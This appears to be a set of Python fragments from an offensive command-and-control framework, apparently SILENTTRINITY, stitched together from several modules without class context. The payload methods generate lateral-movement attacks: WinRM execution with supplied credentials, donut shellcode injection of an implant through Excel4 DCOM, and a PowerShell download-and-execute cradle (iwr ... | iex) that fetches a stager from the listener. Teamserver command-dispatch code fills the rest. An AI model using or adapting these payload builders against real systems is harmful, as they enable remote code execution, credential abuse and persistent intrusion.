def payload(self):
stager = ipc_server.publish_event(Events.GET_STAGERS,
(self.options['Stager']['Value'], ))
listener = ipc_server.publish_event(
Events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if stager and listener:
if self.options['Stager']['Value'] == 'powershell':
stager.options['AsFunction']['Value'] = False
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/winrm.boo'),
'r') as module_src:
guid, psk, stage = stager.generate(listener)
ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
src = module_src.read()
src = src.replace('TARGET', self.options['Host']['Value'])
src = src.replace('USERNAME',
self.options['Username']['Value'])
src = src.replace('DOMAIN', self.options['Domain']['Value'])
src = src.replace('PASSWORD',
self.options['Password']['Value'])
src = src.replace(
'TRUSTED_HOSTS',
str(self.options['AddToTrustedHosts']['Value']).lower())
src = src.replace('PAYLOAD', stage)
return src
print_bad('Invalid stager/listener selected')
def payload(self):
listener = ipc_server.publish_event(
Events.GET_LISTENERS, (self.options['Listener']['Value'], ))
if listener:
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
donut_shellcode = donut.create(
file=get_path_in_package('core/teamserver/data/naga.exe'),
params=f"{guid};{psk};{c2_urls}",
arch=2
if self.options['Architecture']['Value'] == 'x64' else 1)
shellcode = shellcode_to_hex_byte_array(donut_shellcode)
with open(
get_path_in_package(
'core/teamserver/modules/boo/src/excel4dcom.boo')
) as module_src:
src = module_src.read()
src = src.replace('SHELLCODE', shellcode)
src = src.replace('TARGET', self.options['Target']['Value'])
src = src.replace('ARCH',
self.options['Architecture']['Value'])
return src
else:
print_bad(
f"Listener '{self.options['Listener']['Value']}' not found!")
def use(self, TS: str):
"""
Select a specified teamserver for all communication
Usage: use [-h] <TS>
Arguments:
TS teamserver to use
"""
for ts in self.connections:
if ts.alias == TS:
self.selected = ts
print_info(f"Now using {ts.alias} for all comms")
return
print_bad(f"Not currently connected to teamserver '{TS}'")
async def parse_command_line(self, text):
if not await self.switched_context(text):
try:
command = shlex.split(text)
logging.debug(
f"command: {command[0]} args: {command[1:]} ctx: {self.current_context.name}"
)
needs_patch, command = self.patch_badchar(command)
args = docopt(getattr(
self.current_context
if hasattr(self.current_context, command[0]) else self,
command[0]).__doc__,
argv=command[1:])
if needs_patch:
args = self.patch_badchar(args, patch=True)
except ValueError as e:
print_bad(f"Error parsing command: {e}")
except AttributeError as e:
print_bad(f"Unknown command '{command[0]}'")
except DocoptExit:
print_bad("Check command usage")
except SystemExit:
pass
else:
if command[
0] in self._cmd_registry or self.current_context._remote is False:
run_in_terminal(
functools.partial(getattr(
self if command[0] in self._cmd_registry else
self.current_context, command[0]),
args=args))
elif self.current_context._remote is True:
response = await self.teamservers.send(
ctx=self.current_context.name,
cmd=command[0],
args=args)
logging.debug(f"response: {response}")
if response.status == 'success' and response.result:
if hasattr(self.current_context, command[0]):
run_in_terminal(
functools.partial(getattr(
self.current_context, command[0]),
args=args,
response=response))
elif response.status == 'error':
print_bad(response.result)
if self.current_context.name != 'main':
await self.update_prompt(self.current_context)
async def send(self, ctx, cmd, args={}, data={}):
if self.selected and self.selected.stats.CONNECTED:
normalized_args = {}
for k, v in args.items():
if k in ['-h', '--help']:
continue
elif k.startswith("<"):
normalized_args[k[1:-1]] = v
elif k.startswith("--"):
normalized_args[k[2:]] = v
message = {
"id": gen_random_string(),
"ctx": ctx,
"cmd": cmd,
"args": normalized_args,
"data": data
}
return await self.selected.send(message)
print_bad("Not connected to a teamserver")
def payload(self):
stager = ipc_server.publish_event(Events.GET_STAGERS, ('powershell',))
listener = ipc_server.publish_event(Events.GET_LISTENERS, (self.options['Listener']['Value'],))
if stager and listener:
stager.options['AsFunction']['Value'] = False
with open(get_path_in_package('core/teamserver/modules/boo/src/shell.boo'), 'r') as module_src:
guid, psk, stage = stager.generate(listener)
ipc_server.publish_event(Events.SESSION_REGISTER, (guid, psk))
with open(f'stagers/{guid}', 'wb') as stager:
stager.write(stage.encode('latin-1'))
src = module_src.read()
# Assuming the server is hosting a web server at BindIP/stagers !!
execute_command = f"iwr('{listener['BindIP']}/{guid}') -UseBasicParsing|iex"
src = src.replace("COMMAND_TO_RUN", f'powershell -e {powershell_encode(execute_command)}')
src = src.replace("PATH", r"C:\Windows\System32")
src = src.replace("USERNAME", self.options['Username']['Value'])
src = src.replace("DOMAIN", self.options['Domain']['Value'])
src = src.replace("PASSWORD", self.options['Password']['Value'])
return src
else:
print_bad(f"Listener '{self.options['Listener']['Value']}' not found!")